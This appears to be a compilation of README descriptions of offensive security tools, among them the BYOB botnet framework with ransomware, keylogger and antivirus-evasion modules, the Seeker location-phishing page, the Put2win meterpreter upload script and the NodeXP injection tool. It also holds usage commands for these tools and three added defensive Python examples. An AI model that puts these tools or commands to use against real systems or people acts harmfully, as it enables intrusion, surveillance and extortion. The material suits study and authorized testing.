SubScraper uses DNS brute force, Google & Bing scraping, and Virus Total to enumerate subdomains without an API. Written in Python3, SubScraper performs HTTP(S) requests and DNS “A” record lookups during the enumeration process to validate discovered subdomains. This provides further information to help prioritize targets and aid in potential next steps. Post-Enumeration, “CNAME” lookups are displayed to identify subdomain takeover opportunities. 
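The CNAME lookups SubScraper prints after enumeration matter because a CNAME pointing at a name that no longer resolves is the precondition for subdomain takeover. The following added example (not part of SubScraper) shows the zone owner's side of that check: it walks a constructed sample zone with an injectable resolver, so it runs offline, and flags CNAMEs whose target is NXDOMAIN or exists without an A record; swap `sample_resolver` for a real DNS lookup to audit your own zone.

```python
"""Audit a zone's CNAME records for dangling targets (added example)."""
from typing import Callable, Dict, List, Optional, Tuple

# Constructed sample zone: name -> (record type, target). Not a real zone.
SAMPLE_ZONE: Dict[str, Tuple[str, str]] = {
    "www.example.com":  ("A", "203.0.113.10"),
    "blog.example.com": ("CNAME", "blog-host.saas.example.net"),
    "old.example.com":  ("CNAME", "retired-bucket.storage.example.net"),
    "docs.example.com": ("CNAME", "pages.hosting.example.net"),
}

# Constructed resolver answers for the CNAME targets above: a list of
# A records, or None to model an NXDOMAIN response for the target name.
SAMPLE_ANSWERS: Dict[str, Optional[List[str]]] = {
    "blog-host.saas.example.net": ["198.51.100.7"],   # healthy target
    "retired-bucket.storage.example.net": None,        # target no longer exists
    "pages.hosting.example.net": [],                   # exists, but no A record
}

Resolver = Callable[[str], Optional[List[str]]]


def sample_resolver(name: str) -> Optional[List[str]]:
    """Offline stand-in for an A lookup; a real audit would query DNS here."""
    return SAMPLE_ANSWERS.get(name)


def find_dangling_cnames(zone: Dict[str, Tuple[str, str]],
                         resolve: Resolver) -> List[Tuple[str, str, str]]:
    """Return (subdomain, target, reason) for every CNAME whose target does
    not resolve. These are the records an attacker could claim on the
    hosting provider, so the zone owner should remove or re-point them."""
    findings: List[Tuple[str, str, str]] = []
    for name, (rtype, target) in sorted(zone.items()):
        if rtype != "CNAME":
            continue
        answer = resolve(target)
        if answer is None:
            findings.append((name, target, "NXDOMAIN"))
        elif not answer:
            findings.append((name, target, "no A record"))
    return findings


if __name__ == "__main__":
    for sub, target, why in find_dangling_cnames(SAMPLE_ZONE, sample_resolver):
        print(f"{sub} -> {target}: {why}")
```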


Usage

python3 subscraper.py example.com
python3 subscraper.py -t 5 -o csv example.com

Options

  -s              Only use internet to find subdomains
  -b              Only use DNS brute forcing to find subdomains
  -o OUTFILE      Define output file type: csv/txt (Default: None)
  -t MAX_THREADS  Max threads (Default: 10)
  -w SUBLIST      Custom subdomain wordlist

NodeXP is an integrated tool, written in Python 2.7, capable of detecting possible vulnerabilities on Node.js services as well as exploiting them in an automated way, based on the S(erver)S(ide)J(avascript)I(njection) attack.


Getting Started – Installation & Usage
Download NodeXP by cloning the Git repository:

git clone https://github.com/esmog/nodexp

To get a list of all options run:

python2.7 nodexp.py -h

Examples for POST and GET cases accordingly:

python2.7 nodexp.py --url="http://nodegoat.herokuapp.com/contributions" --pdata="preTax=[INJECT_HERE]" -c="connect.sid=s:i6fKU7kSLPX1l00WkOxDmEfncptcZP1v.fy9whjYW0fGAvbavzYSBz1C2ZhheDuQ1SU5qpgVzbTA"
python2.7 nodexp.py --url="http://nodegoat.herokuapp.com/contributions" --pdata="preTax=[INJECT_HERE]" -c="connect.sid=s:i6fKU7kSLPX1l00WkOxDmEfncptcZP1v.fy9whjYW0fGAvbavzYSBz1C2ZhheDuQ1SU5qpgVzbTA" --tech=blind

python2.7 nodexp.py --url="http://192.168.64.30/?name=[INJECT_HERE]" -c="connect.sid=s:i6fKU7kSLPX1l00WkOxDmEfncptcZP1v.fy9whjYW0fGAvbavzYSBz1C2ZhheDuQ1SU5qpgVzbTA"
python2.7 nodexp.py --url="http://192.168.64.30/?name=[INJECT_HERE]" -c="connect.sid=s:i6fKU7kSLPX1l00WkOxDmEfncptcZP1v.fy9whjYW0fGAvbavzYSBz1C2ZhheDuQ1SU5qpgVzbTA" --tech=blind

Disclaimer
The tool’s purpose is strictly academic and was developed in order to conduct my master's thesis. It could also be helpful during the process of a penetration test on Node.js services. Any other malicious or illegal usage of the tool is strongly not recommended and is clearly not a part of the purpose of this research.

Prerequisites

  • Python 2.7
  • Metasploit Framework
  • msfvenom
  • Kali Linux (or any other Linux distro with Metasploit Framework installed)

NodeXP Testbeds

  • Download and run the Node.js files for both GET and POST cases from here
  • Visit Nodegoat or install Nodegoat to your local machine!

Built With

  • Python 2.7

Versioning
NodeXP – Version 1.0.0

Authors

  • Dimitris Antonaropoulos (esmog)

An Open-Source Pre and Post Callback-Based Framework for macOS Kernel Monitoring.
What is Kemon?
An open-source Pre and Post callback-based framework for macOS kernel monitoring. With Kemon, we can easily implement LPC communication monitoring, MAC policy filtering, a kernel driver firewall, etc. In general, from an attacker's perspective, this framework can help build a more powerful rootkit; from a defender's perspective, Kemon can help construct more granular monitoring capabilities. I also implemented a kernel fuzzer through this framework, which helped me find many vulnerabilities, such as CVE-2017-7155, CVE-2017-7163, CVE-2017-13883, etc.


Supported Features
Kemon's features include:

  • file operation monitoring
  • process creation monitoring
  • dynamic library and kernel extension monitoring
  • network traffic monitoring
  • Mandatory Access Control (MAC) policy monitoring, etc.

In addition, the Kemon project can extend its Pre and Post callback-based monitoring interfaces to any macOS kernel function.

Getting Started

How to build the Kemon driver
Use the Xcode project or the makefile to build the Kemon kext driver.

How to use the Kemon driver

  • Please turn off macOS System Integrity Protection (SIP) check if you don't have a valid kernel certificate
  • Use the command “sudo chown -R root:wheel kemon.kext” to change the owner of the Kemon driver
  • Use the command “sudo kextload kemon.kext” to install the Kemon driver
  • Use the command “sudo kextunload kemon.kext” to uninstall the Kemon driver

BYOB (Build Your Own Botnet)

Disclaimer: This project should be used for authorized testing or educational purposes only.
BYOB is an open-source project that provides a framework for security researchers and developers to build and operate a basic botnet to deepen their understanding of the sophisticated malware that infects millions of devices every year and spawns modern botnets, in order to improve their ability to develop counter-measures against these threats.
It is designed to allow developers to easily implement their own code and add cool new features without having to write a RAT (Remote Administration Tool) or a C2 (Command & Control server) from scratch.
The RAT's key feature is that arbitrary code/files can be remotely loaded into memory from the C2 and executed on the target machine without writing anything to the disk.


Server
usage: server.py [-h] [-v] [--host HOST] [--port PORT] [--database DATABASE]
Command & control server with persistent database and console

  • Console-Based User-Interface: streamlined console interface for controlling client host machines remotely via reverse TCP shells which provide direct terminal access to the client host machines
  • Persistent SQLite Database: lightweight database that stores identifying information about client host machines, allowing reverse TCP shell sessions to persist through disconnections of arbitrary duration and enabling long-term reconnaissance
  • Client-Server Architecture: all python packages/modules installed locally are automatically made available for clients to remotely import without writing them to the disk of the target machines, allowing clients to use modules which require packages not installed on the target machines

Client
usage: client.py [-h] [-v] [--name NAME] [--icon ICON] [--pastebin API] [--encrypt] [--obfuscate] [--compress] [--compile] host port [module [module ...]]
Generate fully-undetectable clients with staged payloads, remote imports, and unlimited modules

  • Remote Imports: remotely import third-party packages from the server without writing them to the disk or downloading/installing them
  • Nothing Written To The Disk: clients never write anything to the disk – not even temporary files (zero IO system calls are made) because remote imports allow arbitrary code to be dynamically loaded into memory and directly imported into the currently running process
  • Zero Dependencies (Not Even Python Itself): client runs with just the python standard library, remotely imports any non-standard packages/modules from the server, and can be compiled with a standalone python interpreter into a portable binary executable formatted for any platform/architecture, allowing it to run on anything, even when Python itself is missing on the target host
  • Add New Features With Just 1 Click: any python script, module, or package you copy to the ./byob/modules/ directory automatically becomes remotely importable & directly usable by every client while your command & control server is running
  • Write Your Own Modules: a basic module template is provided in ./byob/modules/ directory to make writing your own modules a straight-forward, hassle-free process
  • Run Unlimited Modules Without Bloating File Size: use remote imports to add unlimited features without adding a single byte to the client's file size
  • Fully Updatable: each client will periodically check the server for new content available for remote import, and will dynamically update its in-memory resources if anything has been added/removed
  • Platform Independent: everything is written in Python (a platform-agnostic language) and the clients generated can optionally be compiled into a portable executable (Windows) or bundled into a standalone application (macOS)
  • Bypass Firewalls: clients connect to the command & control server via reverse TCP connections, which will bypass most firewalls because the default filter configurations primarily block incoming connections
  • Counter-Measure Against Antivirus: avoids being analyzed by antivirus by blocking processes with names of known antivirus products from spawning
  • Encrypt Payloads To Prevent Analysis: the main client payload is encrypted with a random 256-bit key which exists solely in the payload stager which is generated along with it
  • Prevent Reverse-Engineering: by default, clients will abort execution if a virtual machine or sandbox is detected

Modules
Post-exploitation modules that are remotely importable by clients

  1. Keylogger (byob.modules.keylogger): logs the user’s keystrokes & the window name entered
  2. Screenshot (byob.modules.screenshot): take a screenshot of current user’s desktop
  3. Webcam (byob.modules.webcam): view a live stream or capture image/video from the webcam
  4. Ransom (byob.modules.ransom): encrypt files & generate random BTC wallet for ransom payment
  5. Outlook (byob.modules.outlook): read/search/upload emails from the local Outlook client
  6. Packet Sniffer (byob.modules.packetsniffer): run a packet sniffer on the host network & upload .pcap file
  7. Persistence (byob.modules.persistence): establish persistence on the host machine using 5 different methods
  8. Phone (byob.modules.phone): read/search/upload text messages from the client smartphone
  9. Escalate Privileges (byob.modules.escalate): attempt UAC bypass to gain unauthorized administrator privileges
  10. Port Scanner (byob.modules.portscanner): scan the local network for other online devices & open ports
  11. Process Control (byob.modules.process): list/search/kill/monitor currently running processes on the host

Core
Core framework modules used by the generator and the server

  1. Utilities (byob.core.util): miscellaneous utility functions that are used by many modules
  2. Security (byob.core.security): Diffie-Hellman IKE & 3 encryption modes (AES-256-OCB, AES-256-CBC, XOR-128)
  3. Loaders (byob.core.loaders): remotely import any package/module/scripts from the server
  4. Payloads (byob.core.payloads): reverse TCP shell designed to remotely import dependencies, packages & modules
  5. Stagers (byob.core.stagers): generate unique payload stagers to prevent analysis & detection
  6. Generators (byob.core.generators): functions which all dynamically generate code for the client generator
  7. Database (byob.core.database): handles interaction between command & control server and the SQLite database

Contact
Website: https://malwared.com
Email: security@malwared.com
Twitter: https://twitter.com/malwaredllc

Aircrack-ng is a complete suite of tools to assess WiFi network security.

It focuses on different areas of WiFi security:
  • Monitoring: Packet capture and export of data to text files for further processing by third party tools.
  • Attacking: Replay attacks, deauthentication, fake access points and others via packet injection.
  • Testing: Checking WiFi cards and driver capabilities (capture and injection).
  • Cracking: WEP and WPA PSK (WPA 1 and 2).
All tools are command line, which allows for heavy scripting; a lot of GUIs have taken advantage of this. It works primarily on Linux but also on Windows, OS X, FreeBSD, OpenBSD, NetBSD, as well as Solaris and even eComStation 2.

Aircrack-ng 1.4

This release focuses heavily on code quality and adds a few visible features:

  • PMKID cracking
  • Crack 802.11w capture files
  • Speed and memory usage improvement when loading (large) files with Aircrack-ng and Airdecap-ng
  • Packages for Linux distributions and Windows
  • Fix building on various platforms
  • Improved and tweaked our CI/CD processes
  • Using new CI/CD tools for our buildbots and packaging, PyDeployer
  • Almost doubled the amount of tests

PMKID

On routers with 802.11i/p/r, the AP can cache an "ID" for the connection so roaming clients don't have to waste frames reauthenticating and can just use the PMKID, which decreases latency a bit (from 6 frames to only 2).

The PMKID is calculated this way:

PMKID = HMAC-SHA1-128(PMK, "PMK Name" | BSSID | STA MAC)

A big advantage here is that this PMKID is present in the first EAPoL frame of the 4-way handshake.

A few caveats about this attack:

  • Sometimes APs send empty PMKID
  • It doesn't work on WPA/WPA2 Enterprise networks
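The formula above, carried through in code as an added example (not Aircrack-ng's own code): HMAC-SHA1 over "PMK Name" | BSSID | STA MAC, truncated to 128 bits, plus the check for the empty (all-zero) PMKID caveat so that a zeroed field in a capture is never mistaken for a usable value. The PMK and MAC addresses are constructed placeholders; `pmkid_matches` is the kind of check you would run against a capture of your own lab AP whose PMK you know.

```python
"""PMKID derivation and empty-PMKID check (added example, not Aircrack-ng code)."""
import hashlib
import hmac


def mac_to_bytes(mac: str) -> bytes:
    """Parse 'aa:bb:cc:dd:ee:ff' (or with '-' separators) into 6 raw bytes."""
    raw = bytes.fromhex(mac.replace(":", "").replace("-", ""))
    if len(raw) != 6:
        raise ValueError(f"not a 48-bit MAC address: {mac!r}")
    return raw


def derive_pmkid(pmk: bytes, bssid: str, sta_mac: str) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" | BSSID | STA MAC).

    HMAC-SHA1 yields 20 bytes; the '-128' suffix means the result is
    truncated to its first 16 bytes, which is the value carried in the
    RSN PMKID KDE of the first EAPoL frame of the 4-way handshake."""
    if len(pmk) != 32:
        raise ValueError("WPA/WPA2 PMK is 256 bits (32 bytes)")
    data = b"PMK Name" + mac_to_bytes(bssid) + mac_to_bytes(sta_mac)
    return hmac.new(pmk, data, hashlib.sha1).digest()[:16]


def is_empty_pmkid(pmkid: bytes) -> bool:
    """Some APs send an all-zero PMKID; such a capture carries no usable
    value and should be treated as 'no PMKID present'."""
    return len(pmkid) == 16 and pmkid == bytes(16)


def pmkid_matches(capture_pmkid: bytes, pmk: bytes, bssid: str, sta_mac: str) -> bool:
    """Verify a captured PMKID against a known PMK (e.g. your own lab AP).
    Empty PMKIDs never match, so a zeroed field cannot pass as valid."""
    if is_empty_pmkid(capture_pmkid):
        return False
    expected = derive_pmkid(pmk, bssid, sta_mac)
    return hmac.compare_digest(capture_pmkid, expected)


if __name__ == "__main__":
    # Constructed values: a dummy 256-bit PMK and locally administered MACs.
    pmk = bytes(range(32))
    value = derive_pmkid(pmk, "02:00:00:00:00:01", "02:00:00:00:00:02")
    print("PMKID:", value.hex())
```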

When loading a PCAP, Aircrack-ng will detect if it contains a PMKID. In the following screenshot, it is present for the network ogogo; notice the "with PMKID" on the same line:

When selecting the network, it will use it as if it were a regular PCAP with a handshake (and thus the wordlist requirement applies).

If you'd like to test, two capture files with PMKID are available in the test files.

More details about the attack itself can be found in this post.

More info: https://aircrack-ng.blogspot.com/2018/09/aircrack-ng-14.html

Install

git clone https://github.com/aircrack-ng/aircrack-ng
cd aircrack-ng
./autogen.sh
make
make install
cd src/
aircrack-ng

JShell – Get a JavaScript shell with XSS.

Usages
Run shell.py and JShell will automatically try to detect your IP address; the default LPORT is 33.

As you can see, the payload has been generated, and now all you have to do is deliver this payload to the victim.

As soon as you do that, you will get a JS shell over netcat where you can execute your JavaScript code in victim's browser as soon as the injected page is open.
Here's a screenshot:

Credits, Disclaimer & License
This script uses the method demonstrated by Rodolfo Assis.

The concept behind Seeker is simple: just as we host phishing pages to get credentials, why not host a fake page that requests your location, just like many popular location-based websites?
Seeker hosts a fake website on an Apache server and uses Ngrok; the website asks for location permission and, if the user allows it, we can get:
  • Longitude
  • Latitude
  • Accuracy
  • Altitude – Not always available
  • Direction – Only available if user is moving
  • Speed – Only available if user is moving


Along with Location Information we also get Device Information without any permissions :

  • Operating System
  • Platform
  • Number of CPU Cores
  • Amount of RAM – Approximate Results
  • Screen Resolution
  • GPU information
  • Browser Name and Version
  • Public IP Address

This tool is purely a Proof of Concept and is for Educational Purposes Only. Seeker shows what data a malicious website can gather about you and your devices, and why you should not click on random links and grant critical permissions such as Location.

  • Other tools and services offer IP geolocation, which is not very accurate and does not give the user's location.
  • Generally, if a user accepts the location permission, the information received is accurate to approximately 30 meters.

Note: On iPhone, for some reason, location accuracy is approximately 65 meters.

Tested On :

  • Kali Linux 2018.2
  • Ubuntu 18.04
  • Arch Linux based Distro
  • Termux
  • Kali Linux (WSL)

Installation

Ubuntu/Kali Linux

git clone https://github.com/thewhiteh4t/seeker.git
cd seeker/
chmod 777 install.sh
./install.sh

# After Installation just type seeker in console

# OR using Docker

# Install docker

curl -fsSL https://get.docker.com -o get-docker.sh
sh get-docker.sh

# Build Seeker
cd seeker/
docker build -t seeker .

# Launch seeker
docker run -t --rm seeker

Arch Linux Based Distro

# Install docker

pacman -Syy
pacman -S docker
systemctl start docker.service

# Build Seeker
cd seeker/
docker build -t seeker .

# Launch seeker
docker run -t --rm seeker

Termux

cd seeker/termux
chmod 777 install.sh
./install.sh

# After Installation just type seeker in console

If you are unable to get an ngrok URL, ngrok is unable to resolve DNS; switch to mobile data instead of WiFi and it should work. This is a problem with ngrok.

Demo
Youtube – https://www.youtube.com/watch?v=ggUGPq4cjSM

Script to automate shell upload via the HTTP PUT method to get meterpreter.

Dependencies
The nmap and msfvenom tools must be installed for it to work correctly.

Installation
git clone https://github.com/sysdevploit/put2win

Usage
./Put2win.sh -h
This script automatize shell upload by PUT HTTP method to get meterpreter.
Usage: ./Put2win.sh -t TARGET [-p PORT] -u URL_PATH -l LHOST
Examples:

  • ./Put2win.sh -t 192.168.1.80 -u /uploads -l 192.168.1.10
  • ./Put2win.sh -t 192.168.1.80 -p 443 -u /uploads -l 192.168.1.10

Contact
Telegram: @devploit
Twitter: https://www.twitter.com/devploit

A UDP tunnel which tunnels UDP via FakeTCP/UDP/ICMP traffic by using raw sockets, helping you bypass UDP firewalls (or unstable UDP environments). It is encrypted, anti-replay and multiplexed. It also acts as a connection stabilizer.

Support Platforms
A Linux host (including desktop Linux, Android phone/tablet, OpenWRT router, or Raspberry Pi) with root access.
For Windows/MacOS, a virtual image with udp2raw pre-installed has been released; you can load it with VMware/VirtualBox. The virtual image has been set to obtain an IP automatically, so udp2raw can be run immediately after boot finishes (make sure the network mode of the virtual machine has been set to bridged). Only udp2raw has to be run under a virtual machine; all other programs run under Windows/MacOS as usual.
Features
Send / Receive UDP Packet with fake-tcp/icmp headers
Fake-tcp/icmp headers help you bypass UDP blocking, UDP QoS or improper UDP NAT behavior on some ISPs. Raw packets with UDP headers are also supported. In UDP header mode, it behaves just like a normal UDP tunnel, and you can just make use of the other features.
Simulate TCP Handshake
Simulates the 3-way handshake, along with seq and ack_seq. TCP options MSS, sackOk, TS, TS_ack, wscale are also simulated. Real-time delivery guaranteed, no TCP over TCP problem when using OpenVPN.
Encryption, Anti-Replay, No MITM
  • Encrypt your traffic with AES-128-CBC.
  • Protect data integrity by MD5 or CRC32.
  • Defend against replay attacks with an anti-replay window, similar to IPsec and OpenVPN.
  • Authenticate mutually, no MITM attacks.
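The anti-replay window mentioned above, worked through as an added example (not udp2raw's own code): a sliding bitmap window in the style of the IPsec ESP window that udp2raw and OpenVPN compare themselves to. It accepts out-of-order packets that still fall inside the window, drops exact replays, and drops packets older than the window; the packet sequence it runs over is constructed.

```python
"""Sliding anti-replay window (added example; not udp2raw's own code)."""
from typing import List, Tuple


class AntiReplayWindow:
    """Tracks the highest sequence number accepted plus a bitmap of the
    `size` most recent ones, so reordering inside the window is tolerated
    while a replayed or too-old packet is rejected."""

    def __init__(self, size: int = 64) -> None:
        if size < 1:
            raise ValueError("window size must be positive")
        self.size = size
        self.highest = 0            # 0 means nothing accepted yet
        self.bitmap = 0             # bit i set => seq (highest - i) was seen
        self._mask = (1 << size) - 1

    def accept(self, seq: int) -> bool:
        """Return True and record `seq` if it is new; False for a replay or
        for a packet older than the window (both should be dropped)."""
        if seq <= 0:
            return False                      # 0 is reserved as 'never seen'
        if seq > self.highest:
            shift = seq - self.highest
            # Slide the window forward; a jump beyond it clears all history.
            if shift >= self.size:
                self.bitmap = 1
            else:
                self.bitmap = ((self.bitmap << shift) | 1) & self._mask
            self.highest = seq
            return True
        offset = self.highest - seq
        if offset >= self.size:
            return False                      # too old to be tracked
        if (self.bitmap >> offset) & 1:
            return False                      # already seen: replay
        self.bitmap |= 1 << offset            # late but legitimate packet
        return True


def filter_sequence(seqs: List[int], size: int = 64) -> List[Tuple[int, bool]]:
    """Run a packet sequence through one window and report each verdict,
    which makes reordering tolerance versus replay rejection visible."""
    window = AntiReplayWindow(size)
    return [(seq, window.accept(seq)) for seq in seqs]


if __name__ == "__main__":
    # Constructed sequence: reordering (3 after 5), a replay of 3, a long gap
    # (100), then a packet that fell out of the 8-wide window (92).
    for seq, ok in filter_sequence([1, 5, 3, 3, 100, 92, 93, 100], size=8):
        print(f"seq {seq:3d}: {'accept' if ok else 'drop'}")
```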
Failure Detection & Stabilization (Connection Recovery)
Connection failures are detected by heartbeats. If timed-out, the client will automatically change port number and reconnect. If reconnection is successful, the previous connection will be recovered, and all existing UDP conversations will stay valid.
For example, if you use UDP2RAW + OpenVPN, OpenVPN won't lose connection after any reconnect, even if the network cable is re-plugged or the WiFi access point is changed.
Other Features
  • Multiplexing: One client can handle multiple UDP connections, all of which share the same raw connection.
  • Multiple Clients: One server can have multiple clients.
  • NAT Support: All of the 3 modes work in NAT environments.
  • OpenVZ Support: Tested on BandwagonHost.
  • OpenWRT Support: No dependencies, easy to build. Binaries for ar71xx are included in the release.

Keywords
UDP QoS Bypass, UDP Blocking Bypass, OpenVPN TCP over TCP problem, OpenVPN over ICMP, UDP to ICMP tunnel, UDP to TCP tunnel, UDP over ICMP, UDP over TCP

Getting Started

Installing
Download binary release from https://github.com/wangyu-/udp2raw-tunnel/releases

Running
Assume your UDP is blocked, being QoS-ed, or just poorly supported. Assume your server IP is 44.55.66.77 and you have a service listening on UDP port 7777.

# Run at server side:
./udp2raw_amd64 -s -l0.0.0.0:4096 -r 127.0.0.1:7777 -a -k "passwd" --raw-mode faketcp

# Run at client side
./udp2raw_amd64 -c -l0.0.0.0:3333 -r44.55.66.77:4096 -a -k "passwd" --raw-mode faketcp

Server Output:

Client Output:

Now, an encrypted raw tunnel has been established between client and server through TCP port 4096. Connecting to UDP port 3333 at the client side is equivalent to connecting to port 7777 at the server side. No UDP traffic will be exposed.

Note
To run on Android, see the Android_Guide.

Advanced Topic

Usage

udp2raw-tunnel
version: Aug 18 2017 00:29:11
repository: https://github.com/wangyu-/udp2raw-tunnel

usage:
run as client : ./this_program -c -l local_listen_ip:local_port -r server_ip:server_port [options]
run as server : ./this_program -s -l server_listen_ip:server_port -r remote_ip:remote_port [options]

common options, these options must be same on both side:
--raw-mode avaliable values:faketcp(default), udp, icmp
-k, --key password to gen symetric key, default:"secret key"
--cipher-mode avaliable values:aes128cbc(default), xor, none
--auth-mode avaliable values:md5(default), crc32, simple, none
-a, --auto-rule auto add (and delete) iptables rule
-g, --gen-rule generate iptables rule then exit
--disable-anti-replay disable anti-replay, not suggested
client options:
--source-ip force source-ip for raw socket
--source-port force source-port for raw socket, tcp/udp only
this option disables port changing while re-connecting
other options:
--log-level 0:never 1:fatal 2:error 3:warn
4:info (default) 5:debug 6:trace
--log-position enable file name, function name, line number in log
--disable-color disable log color
--disable-bpf disable the kernel space filter, most time its not necessary
unless you suspect there is a bug
--sock-buf buf size for socket, >=10 and <=10240, unit:kbyte, default:1024
--seqmode seq increase mode for faketcp:
0:dont increase
1:increase every packet
2:increase randomly, about every 3 packets (default)
--lower-level send packet at OSI level 2, format:'if_name#dest_mac_adress'
ie:'eth0#00:23:45:67:89:b9'.Beta.
-h, --help print this help message

IPTABLES rule
This program sends packets via a raw socket. In FakeTCP mode, Linux kernel TCP packet processing has to be blocked by an iptables rule on both sides; otherwise the kernel will automatically send an RST for an unrecognized TCP packet and you will suffer stability/performance problems. You can use the -a option to let the program automatically add/delete the iptables rule on start/exit. You can also use the -g option to generate the iptables rule and add it manually.

cipher-mode and auth-mode
It is suggested to use aes128cbc + md5 to obtain maximum security. If you want to run the program on a router, you can try xor + simple, which can fool packet inspection by firewalls most of the time, but it cannot protect you from serious attacks. Mode none is only for debugging purposes; it is not recommended to set the cipher-mode or auth-mode to none.

seq-mode
The FakeTCP mode does not behave 100% like a real TCP connection. ISPs may be able to distinguish the simulated TCP traffic from real TCP traffic (though it's costly). seq-mode lets you change the seq increase behavior slightly. If you experience connection problems, try changing the value.

Performance Test

Test method:
iperf3 TCP via OpenVPN + udp2raw (iperf3 UDP mode is not used because of a bug mentioned in this issue: https://github.com/esnet/iperf/issues/296). Instead, we package the TCP traffic into UDP with OpenVPN to test the performance. Read Application for details.

iperf3 command:

iperf3 -c 10.222.2.1 -P40 
iperf3 -c 10.222.2.1 -P40 -R

Environments

  • Client: Vultr $2.5/monthly plan (single core 2.4GHz CPU, 512MB RAM, Tokyo, Japan)
  • Server: BandwagonHost $3.99/annually plan (single core 2.0GHz CPU, 128MB RAM, Los Angeles, USA)

Test1
raw_mode: faketcp, cipher_mode: xor, auth_mode: simple

(reverse speed was similar and not uploaded)

Test2
raw_mode: faketcp, cipher_mode: aes128cbc, auth_mode: md5

(reverse speed was similar and not uploaded)

Application

Tunneling any traffic via raw traffic by using udp2raw + OpenVPN

  1. bypasses UDP block/UDP QoS
  2. no TCP over TCP problem (TCP over TCP problem: http://sites.inka.de/bigred/devel/tcp-tcp.html , https://community.openvpn.net/openvpn/ticket/2 )
  3. OpenVPN over ICMP also becomes a choice

More details at openvpn+udp2raw_guide

Speed-up TCP connections via raw traffic by using udp2raw + kcptun
kcptun is a TCP connection speed-up program; it speeds up TCP connections by using the KCP protocol on top of UDP. By using udp2raw, you can use kcptun while UDP is QoS-ed or blocked. (kcptun: https://github.com/xtaci/kcptun)

Speed-up TCP connections via raw traffic by using udp2raw + finalspeed
finalspeed is a TCP connection speed-up program similar to kcptun; it speeds up TCP connections by using the KCP protocol on top of UDP or TCP. Its TCP mode doesn't support OpenVZ, but you can bypass this problem if you use udp2raw + finalspeed together, and ICMP mode also becomes available.

Other

Easier installation on ArchLinux

yaourt -S udp2raw-tunnel # or
pacaur -S udp2raw-tunnel

drozer (formerly Mercury) is the leading security testing framework for Android.
drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS.
drozer provides tools to help you use, share and understand public Android exploits. It helps you to deploy a drozer Agent to a device through exploitation or social engineering. Using weasel (MWR's advanced exploitation payload) drozer is able to maximise the permissions available to it by installing a full agent, injecting a limited agent into a running process, or connecting a reverse shell to act as a Remote Access Tool (RAT).
drozer is open source software, maintained by MWR InfoSecurity, and can be downloaded from: mwr.to/drozer


Prerequisites

  1. Python 2.7

Note: On Windows please ensure that the path to the Python installation and the Scripts folder under the Python installation are added to the PATH environment variable.

  2. Protobuf 2.6 or greater
  3. Pyopenssl 16.2 or greater
  4. Twisted 10.2 or greater
  5. Java Development Kit 1.7

Note: On Windows please ensure that the path to javac.exe is added to the PATH environment variable.

  6. Android Debug Bridge

Installing

Building Python wheel

git clone https://github.com/mwrlabs/drozer/
cd drozer
python setup.py bdist_wheel

Installing Python wheel

sudo pip install drozer-2.x.x-py2-none-any.whl

Building for Debian/Ubuntu/Mint

git clone https://github.com/mwrlabs/drozer/
cd drozer
make deb

Installing .deb (Debian/Ubuntu/Mint)

sudo dpkg -i drozer-2.x.x.deb

Building for Redhat/Fedora/CentOS

git clone https://github.com/mwrlabs/drozer/
cd drozer
make rpm

Installing .rpm (Redhat/Fedora/CentOS)

sudo rpm -i drozer-2.x.x-1.noarch.rpm

Building for Windows
NOTE: Windows Defender and other Antivirus software will flag drozer as malware (an exploitation tool without exploit code wouldn't be much fun!). In order to run drozer you would have to add an exception to Windows Defender and any antivirus software. Alternatively, we recommend running drozer in a Windows/Linux VM.

git clone https://github.com/mwrlabs/drozer/
cd drozer
python.exe setup.py bdist_msi

Installing .msi (Windows)

Run dist/drozer-2.x.x.win-x.msi 

Arch Linux
yaourt -S drozer

Usage

Installing the Agent
Drozer can be installed using Android Debug Bridge (adb).
Download the latest Drozer Agent here.
$ adb install drozer-agent-2.x.x.apk

Starting a Session
You should now have the drozer Console installed on your PC, and the Agent running on your test device. Now, you need to connect the two and you’re ready to start exploring.
We will use the server embedded in the drozer Agent to do this.
If using the Android emulator, you need to set up a suitable port forward so that your PC can connect to a TCP socket opened by the Agent inside the emulator, or on the device. By default, drozer uses port 31415:
$ adb forward tcp:31415 tcp:31415
Now, launch the Agent, select the “Embedded Server” option and tap “Enable” to start the server. You should see a notification that the server has started.
Then, on your PC, connect using the drozer Console:
On Linux:
$ drozer console connect
On Windows:
> drozer.bat console connect
If using a real device, the IP address of the device on the network must be specified:
On Linux:
$ drozer console connect --server 192.168.0.10
On Windows:
> drozer.bat console connect --server 192.168.0.10
You should be presented with a drozer command prompt:

selecting f75640f67144d9a3 (unknown sdk 4.1.1)  
dz>

The prompt confirms the Android ID of the device you have connected to, along with the manufacturer, model and Android software version.
You are now ready to start exploring the device.

Command Reference

Command        Description
run            Executes a drozer module.
list           Show a list of all drozer modules that can be executed in the current session. This hides modules that you do not have suitable permissions to run.
shell          Start an interactive Linux shell on the device, in the context of the Agent process.
cd             Mounts a particular namespace as the root of the session, to avoid having to repeatedly type the full name of a module.
clean          Remove temporary files stored by drozer on the Android device.
contributors   Displays a list of people who have contributed to the drozer framework and modules in use on your system.
echo           Print text to the console.
exit           Terminate the drozer session.
help           Display help about a particular command or module.
load           Load a file containing drozer commands, and execute them in sequence.
module         Find and install additional drozer modules from the Internet.
permissions    Display a list of the permissions granted to the drozer Agent.
set            Store a value in a variable that will be passed as an environment variable to any Linux shells spawned by drozer.
unset          Remove a named variable that drozer passes to any Linux shells that it spawns.

Contacting the Project
drozer is Open Source software, made great by contributions from the community.
For full source code, to report bugs, suggest features and contribute patches please see our Github project:
https://github.com/mwrlabs/drozer
Bug reports, feature requests, comments and questions can be submitted here.
For the latest drozer news, follow the project on Twitter:
@mwrdrozer